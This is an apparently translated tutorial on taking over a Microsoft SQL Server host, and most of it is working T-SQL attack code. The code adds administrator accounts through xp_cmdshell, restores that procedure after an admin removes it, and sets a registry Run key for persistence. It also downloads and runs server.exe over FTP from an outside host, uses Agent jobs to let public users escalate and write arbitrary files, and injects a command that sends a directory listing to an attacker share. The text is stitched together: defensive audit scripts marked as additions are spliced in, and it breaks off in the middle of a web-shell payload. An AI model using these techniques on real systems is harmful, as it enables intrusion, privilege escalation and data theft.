How to execute commands in MSSQL

Source: Internet
Author: User

Suppose a host exposes port 1433 and we have obtained a remote connection to it, either through SQL injection or through a weak password.

How can we add an administrator account (or, more generally, execute system commands)?

1) xp_cmdshell 'cmd.exe /c net user aaa bbb /add'

This is the method everyone knows. Its biggest advantage is that the output is echoed back; what it fears most is the following:

IF EXISTS (SELECT * FROM dbo.sysobjects
           WHERE id = OBJECT_ID(N'[dbo].[xp_cmdshell]')
             AND OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
    EXEC sp_dropextendedproc N'[dbo].[xp_cmdshell]'

The T-SQL above removes this extended stored procedure.

To restore it we generally use, on SQL Server 2000:

EXEC sp_addextendedproc xp_cmdshell, @dllname = 'xplog70.dll'

and on SQL Server 7.0:

EXEC sp_addextendedproc xp_cmdshell, @dllname = 'xpsql70.dll'

However, some administrators also know that sp_addextendedproc itself is an ordinary stored procedure and can be dropped just like any other:

DROP PROCEDURE sp_addextendedproc

IF EXISTS (SELECT * FROM dbo.sysobjects
           WHERE id = OBJECT_ID(N'[dbo].[xp_cmdshell]')
             AND OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
    EXEC sp_dropextendedproc N'[dbo].[xp_cmdshell]'

To restore it, recreate the procedure from its original definition:

CREATE PROCEDURE sp_addextendedproc --- 1996/08/30 20:13
    @functname nvarchar(517),  /* (owner.)name of function to call */
    @dllname   varchar(255)    /* name of DLL containing function */
AS
    SET IMPLICIT_TRANSACTIONS OFF
    IF @@trancount > 0
    BEGIN
        RAISERROR(15002, -1, -1, 'sp_addextendedproc')
        RETURN (1)
    END
    /*
    ** Create the extended procedure mapping.
    */
    DBCC addextendedproc(@functname, @dllname)
    RETURN (0) -- sp_addextendedproc

After all of that, there is actually a much simpler protection method: run NET STOP MSSQLSERVER, delete xplog70.dll (xpsql70.dll on SQL Server 7.0), and then start the service again.

2) After reading the above, you will understand that xp_cmdshell can always be removed in the end. Is there any other way?

Write to the registry:

xp_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'czy82', 'REG_SZ', 'net user czy bb /add'

In fact, several places in the registry can be used, for example the web browser settings stored there.

The drawback of writing the registry is that there is no echo, and nothing happens until the entry is actually run.

3)

DECLARE @s int
EXEC sp_OACreate 'wscript.shell', @s OUT
-- EXEC sp_OAMethod @s, 'run', NULL, 'cmd.exe /c echo open ASP.7i24.com > c:\a.txt'
-- EXEC sp_OAMethod @s, 'run', NULL, 'cmd.exe /c echo 123321 >> c:\a.txt'
-- EXEC sp_OAMethod @s, 'run', NULL, 'cmd.exe /c echo 123321 >> c:\a.txt'
-- EXEC sp_OAMethod @s, 'run', NULL, 'cmd.exe /c echo get server.exe >> c:\a.txt'
-- EXEC sp_OAMethod @s, 'run', NULL, 'cmd.exe /c echo close >> c:\a.txt'
-- EXEC sp_OAMethod @s, 'run', NULL, 'cmd.exe /c ftp -s:c:\a.txt'
EXEC sp_OAMethod @s, 'run', NULL, 'cmd.exe /c server'

In other words, sp_OACreate and sp_OAMethod can also be used to call COM objects such as FSO, WSH and the shell. The problem is that, unlike xp_cmdshell, they return no output.

Can't you see the result right away? Look at the following:

DECLARE @s int, @o int, @f int, @str nvarchar(4000)
/* EXEC sp_OACreate 'wscript.shell', @s OUT
   EXEC sp_OAMethod @s, 'run', NULL, 'cmd.exe /c net user > c:\temp.txt' */
EXEC sp_OACreate 'scripting.filesystemobject', @o OUT
EXEC sp_OAMethod @o, 'opentextfile', @f OUT, 'c:\temp.txt', 1
EXEC sp_OAMethod @f, 'readall', @str OUT
PRINT @str

First run the commented part, then the rest. The principle is simple: use > to redirect the command output into a file, then read that file back with FSO. Very practical.
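The three paths above (xp_cmdshell, xp_regwrite and the sp_OA* automation procedures) all live in master, so an administrator can audit and close them in one place. The following T-SQL is an added example, not code from the article; it assumes SQL Server 2005 or later, where the sp_configure switches exist (the SQL 7/2000 instances the article targets only had the drop-the-procedure option described above).

```sql
-- Added audit script, not part of the original article. Assumes SQL Server 2005+,
-- where xp_cmdshell and the OLE Automation procedures are gated by sp_configure switches.
USE master;
GO

-- 1. Instance-level switches for the two command-execution paths (xp_cmdshell, sp_OACreate).
--    value_in_use = 1 means the feature is live right now.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures');

-- 2. Extended procedures registered with sp_addextendedproc and the DLL each one maps to.
--    A re-registered xp_cmdshell, or a copy registered under another name, appears here.
SELECT name, dll_name
FROM sys.extended_procedures
ORDER BY dll_name, name;

-- 3. Explicit EXECUTE grants on the procedures the article uses. Only sysadmin should be
--    able to reach them; a row naming public or an application user is a finding.
SELECT o.name AS procedure_name, dp.name AS grantee, p.permission_name, p.state_desc
FROM sys.database_permissions AS p
JOIN sys.database_principals AS dp ON dp.principal_id = p.grantee_principal_id
JOIN sys.all_objects AS o ON o.object_id = p.major_id
WHERE p.class_desc = 'OBJECT_OR_COLUMN'
  AND o.name IN ('xp_cmdshell', 'xp_regwrite', 'xp_regread', 'sp_OACreate', 'sp_OAMethod');

-- 4. Remediation: switch both features off. This is the supported equivalent of the
--    article's "stop the service and delete xplog70.dll" advice.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Re-enabling either switch writes a "Configuration option 'xp_cmdshell' changed from 0 to 1" line to the SQL Server error log, which is the event to alert on once the hardening is in place.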

4)

USE msdb  -- do not use master here
EXEC sp_add_job @job_name = 'czy82'
EXEC sp_add_jobstep @job_name = 'czy82', @step_name = 'exec my sql', @subsystem = 'cmdexec', @command = 'dir c:\ > c:\b.txt'
EXEC sp_add_jobserver @job_name = 'czy82', @server_name = 'smscomputer'
EXEC sp_start_job @job_name = 'czy82'

SQL Server Agent jobs can also execute commands. If the @subsystem parameter above is changed to tsql, the command is executed as a T-SQL statement instead.

To use these stored procedures, first, @server_name must be the name of your SQL Server; second, the SQLSERVERAGENT service must be running (it is not started by default):

NET START SQLSERVERAGENT

Another difference with this approach is that members of public can run it as well. Here is a more systematic look:

USE msdb
EXEC sp_add_job @job_name = 'GetSystemOnSQL',
    @enabled = 1,
    @description = 'This will give a low privileged user access to xp_cmdshell',
    @delete_level = 1
EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',
    @step_name = 'Exec my sql',
    @subsystem = 'TSQL',
    @command = 'exec master..xp_execresultset N''select ''''exec master..xp_cmdshell "dir > c:\agent-job-results.txt"'''', N''master'''
EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',
    @server_name = 'your SQL Server name'
EXEC sp_start_job @job_name = 'GetSystemOnSQL'

Don't doubt it: the code above has been tested successfully. Note the role of xp_execresultset here: it is what allows xp_cmdshell to be executed as a member of public.

5) Microsoft SQL Agent jobs: arbitrary files can be deleted and overwritten (by public users as well)

There is an article on XFocus: http://www.xfocus.net/vuln/vul_view.php?vul_id=2968

USE msdb
EXEC sp_add_job @job_name = 'ArbitraryFileCreate',
    @enabled = 1,
    @description = 'This will create a file called c:\sqlafc123.txt',
    @delete_level = 1
EXEC sp_add_jobstep @job_name = 'ArbitraryFileCreate',
    @step_name = 'SQLAFC',
    @subsystem = 'TSQL',
    @command = 'select ''hello, this file was created by the SQL Agent.''',
    @output_file_name = 'c:\sqlafc123.txt'
EXEC sp_add_jobserver @job_name = 'ArbitraryFileCreate',
    @server_name = 'server_name'
EXEC sp_start_job @job_name = 'ArbitraryFileCreate'

If the subsystem is tsql, the generated file carries the following header:

Job 'ArbitraryFileCreate' : Step 1, 'SQLAFC' : ... 18:24:19
----------------------------------------------
hello, this file was created by the SQL Agent.
(1 row(s) affected)

Therefore, to generate a clean file, choose cmdexec as the subsystem instead. Used well, this lets you write a VBS file containing an add-administrator command into the Startup folder!
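Sections 4 and 5 both rely on the same primitive: a job step created by a low-privileged login that runs outside T-SQL, calls the shell from T-SQL, or redirects its output to a file. The following T-SQL is an added audit, not code from the article; it assumes the SQL Server 2005+ msdb catalog tables, and the job names from the article (czy82, GetSystemOnSQL, ArbitraryFileCreate) would each surface in the first query because of their subsystem, command text or output file.

```sql
-- Added SQL Server Agent audit, not part of the original article. Assumes SQL Server 2005+.
USE msdb;
GO

-- 1. Job steps that leave T-SQL, call the command shell from T-SQL, or redirect step
--    output to a file (the arbitrary-file-write path described above).
SELECT j.name AS job_name, j.date_created, SUSER_SNAME(j.owner_sid) AS owner_login,
       s.step_id, s.step_name, s.subsystem, s.command, s.output_file_name
FROM dbo.sysjobs AS j
JOIN dbo.sysjobsteps AS s ON s.job_id = j.job_id
WHERE s.subsystem IN ('CmdExec', 'PowerShell', 'ActiveScripting')
   OR s.command LIKE '%xp_cmdshell%'
   OR s.command LIKE '%xp_execresultset%'
   OR s.command LIKE '%sp_OACreate%'
   OR s.output_file_name IS NOT NULL
ORDER BY j.date_created DESC;

-- 2. Jobs owned by a login that is not sysadmin, or whose owner no longer exists
--    (IS_SRVROLEMEMBER returns NULL for an unknown login, hence the ISNULL).
SELECT j.name AS job_name, SUSER_SNAME(j.owner_sid) AS owner_login
FROM dbo.sysjobs AS j
WHERE ISNULL(IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(j.owner_sid)), 0) = 0;

-- 3. Who may create and start jobs at all: direct grants to public on the job procedures
--    (the pre-2005 default the article exploits) and members of the Agent database roles.
SELECT o.name AS procedure_name, p.permission_name, p.state_desc
FROM sys.database_permissions AS p
JOIN sys.database_principals AS dp ON dp.principal_id = p.grantee_principal_id
JOIN sys.objects AS o ON o.object_id = p.major_id
WHERE dp.name = 'public'
  AND o.name IN ('sp_add_job', 'sp_add_jobstep', 'sp_add_jobserver', 'sp_start_job');

SELECT r.name AS role_name, m.name AS member_name
FROM sys.database_role_members AS rm
JOIN sys.database_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.database_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name IN ('SQLAgentUserRole', 'SQLAgentReaderRole', 'SQLAgentOperatorRole');
```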

6) sp_makewebtask (a file with arbitrary content and an arbitrary file name can be written)

The following example uses sp_MScopyscriptfile:

DECLARE @command varchar(100)
DECLARE @scripfile varchar(200)
SET CONCAT_NULL_YIELDS_NULL OFF
SELECT @command = 'dir c:\ > "\\attackerip\share\dir.txt"'
SELECT @scripfile = 'c:\autoexec.bat > nul" | ' + @command + ' | rd "'
EXEC sp_MScopyscriptfile @scripfile, ''

Both are still being tested.

Let a public user of MSSQL get a local web shell :)

sp_makewebtask @outputfile = 'd:\sms\a.asp', @charset = gb2312,
-- @query = 'select '''''
-- @query = 'select '''''
@query = 'select ''
"method="POST">
